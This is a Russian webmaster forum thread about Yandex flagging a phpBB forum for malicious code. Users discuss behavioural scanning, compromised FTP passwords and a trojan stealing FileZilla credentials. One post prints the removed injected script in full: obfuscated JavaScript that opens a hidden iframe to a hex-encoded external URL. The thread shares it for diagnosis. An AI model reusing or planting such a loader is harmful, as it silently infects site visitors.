Форум Поисковые системы Яндекс

Вредоносный код - мессадж от Яндекса

12 3
S
На сайте с 17.12.2008
Offline
295
strefapl
6424

Только что пришло сообщение на почту от Я. Вебмастера:

На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

Сайт - форум. Без спама, все чистенько. Зашел в Вебмастер, напротив урла красный монстрик, жму по нему, пишут:

Вердикт - поведенческий анализ.

Запросил перепроверку, в течении нескольких дней обещают сделать. Написал хостеру.

Чего вообще такое за поведенческий анализ, и че делать?

15 жирных вечных ссылок с трастовых сайтов с высоким ТИЦ ( https://goo.gl/zd62Qa ) Найдем и устраним SEO-ошибки Вашего сайта, которые мешают продвижению ( https://goo.gl/gHsx1U ) Высококачественный рерайтинг: 50 р. / 1000 знаков ( https://goo.gl/5xDmhE )
SaleSeo
На сайте с 26.07.2007
Offline
352
SaleSeo
#1

Вири то бывают хитрые

На 5 мин активируются, потом чистят код

Пароли ftp меняйте

Бывает глючит Я, ждите перепроверки.

Если Гугл будет ругаться, значит дело не чисто

Возможно в кеше засел он также если есть у форума... почистите его.

Прогон BULLET для крауд,PNB,зеркал,доров https://bootmasterru.com/postingbyxrumer.html | Честное SEO,настройка Я Директ,семантика и оптимизация под ключ https://saleseo.ru :)
Куда делись платоны? Cервис Обнаружил код Яндекс Google Search Console не
S
На сайте с 17.12.2008
Offline
295
strefapl
#2

Вот тут проверил http://vms.drweb.com/online - чисто.

Да и неясно, чего за поведенческий анализ, может, кто в теме.

savage
На сайте с 10.01.2007
Offline
224
savage
#3

Ищите iframe или левый javascript в коде или в шаблонах сайта.

Купить / продать сайт ( https://www.telderi.ru/?pid=ca1f70 ) | Недорогой и надежный хостинг ( https://www.get-host.ru )
Tryerty
На сайте с 04.12.2007
Offline
68
Tryerty
#4

Следует обратится к источнику:

Антивирусный комплекс Яндекса построен на ином подходе — поведенческом. Его суть в том, что программа имитирует поведение пользователя — робот заходит на проверяемую страницу и анализирует, что происходит в системе. Если без ведома пользователя начинает исполняться или скачиваться какая-либо программа, скорее всего, страница заражена.

подробнее.

Движение вверх нельзя воспринимать как движение вперед не только с точки зрения физики. Достаточно взглянуть, ЧТО плавает на поверхности...
S
На сайте с 17.12.2008
Offline
295
strefapl
#5

Нашел в шаблоне phpbb3 такой код - удалил:

<script>
document.createElement('WsBFDNTQza');

SYnOALmRHZ().writeln('<WsBFDNTQza class = "kcyultGAhH" name = "BxxllzWuUD" id = "uBtmmUBLAY"></WsBFDNTQza>');

ezMaSXIDQJ('uBtmmUBLAY');

var kthrNdrpyx = xxTBwMXyQR('uBtmmUBLAY');

SYnOALmRHZ().writeln(BfnoofVBzn());

var BfnoofVBzn = SYnOALmRHZ().getElementById('QGJnbPKUDH');

BfnoofVBzn.style.display = "none";

BfnoofVBzn.src = kthrNdrpyx;

function ezMaSXIDQJ ( WAgbiGAeYe ) {
WAgbiGAeYe = document.getElementById(WAgbiGAeYe);
WAgbiGAeYe.text = '';
WAgbiGAeYe.style.border = '1px Solid White';
WAgbiGAeYe.text = rriTTRHEQa();
WAgbiGAeYe.style.display = 'none';
}

function rriTTRHEQa() {
return '\x68\x74\x74\x70\x3a\x2f\x2f\x62\x65\x61\x75\x74\x69\x66\x75\x6c\x6c\x77\x6f\x72\x6c\x64\x2e\x63\x6f\x2e\x63\x63\x2f\x71\x75\x61\x64\x72\x6f\x2f\x78\x6f\x6b\x6d\x63\x71\x69\x7a\x69\x6e\x33\x2e\x70\x68\x70';
}

function SYnOALmRHZ ( BfnoofVBzn ) {return document;}

function xxTBwMXyQR ( WAgbiGAeYe ) {
var AlSLcQPqeB = WAgbiGAeYe = document.getElementById(WAgbiGAeYe);
AlSLcQPqeB = WAgbiGAeYe.text;
WAgbiGAeYe.text = '';
return AlSLcQPqeB;
}

function BfnoofVBzn ( WAgbiGAeYe ) {
return '<iframe name = "JMsWfTCXPJ" id = "QGJnbPKUDH" class = "XsBoSKCGLp"></iframe>';
}
</script>

Ни одна онлайн чекалка не сообразила.

#kletka#
На сайте с 15.04.2004
Offline
170
#kletka#
#6

я заметил, что только Аваст ловит, заражения такие.

сам словил недавно и нашел откуда - троянка ловит сохраненные пароли с ФайлЗиллы

Продаю фото со всех фотобанков по 1$ по Расширенной лицензии. Skype: kletka79
S
На сайте с 28.10.2005
Offline
312
semenov
#7

Лечите компы с доступом к сайту, лечите сам сайт

fivefinger
На сайте с 27.01.2011
Offline
87
fivefinger
#8

Вы не одиноки, даже CMSMagazine пострадал. Не хорошая тенденция намечается. :(

EvilMinds - пока другие делают вид, мы работаем на результат. (/ru/forum/936293)
S
На сайте с 28.10.2005
Offline
312
semenov
#9

Тенденция называется "Пора распрямлять руки"

AgrinG
На сайте с 21.06.2008
Offline
41
AgrinG
#10

Тот же прикол от Яндекса.

Причем сначала один сайт - нажал перепроверить - за ночь исчезло.

Сейчас опять вылезло - уже на трех других.

Самое интересное что пишет страницы, которые изменялись в лучшем случае году в 10, на достаточно старых сайтах.

Жизнь как собачья упряжка - только у вожака изменяется пейзаж.
Не могу найти на В Картах Google можно Новый информер Яндекс.Метрики появился
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий